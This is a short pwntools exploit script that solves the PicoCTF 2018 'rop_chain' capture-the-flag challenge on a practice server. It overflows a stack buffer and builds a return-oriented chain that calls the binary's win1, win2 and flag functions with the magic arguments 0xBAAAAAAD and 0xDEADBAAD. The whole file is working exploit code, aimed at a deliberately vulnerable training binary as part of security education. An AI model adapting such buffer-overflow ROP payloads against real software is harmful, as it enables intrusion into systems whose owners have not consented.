from pwn import *
from LibcSearcher import *

context(os='linux',arch='i386',log_level='debug')
# io  = remote('192.168.95.131',10001)
io = remote('node4.buuoj.cn',25494)

elf = ELF('./PicoCTF_2018_rop_chain')
win1_funtion_addr = 0x080485CB
win2_funtion_addr = 0x080485D8
flag_funtion_addr = 0x0804862B
main_addr         = elf.symbols["main"]
pause()

io.recvuntil(b"Enter your input>")

payload = flat(b"A"*0x1C, win1_funtion_addr,win2_funtion_addr,flag_funtion_addr,0xBAAAAAAD,0xDEADBAAD,main_addr,)

pause()
io.sendline(payload)

io.recv()

io.recv()

pause()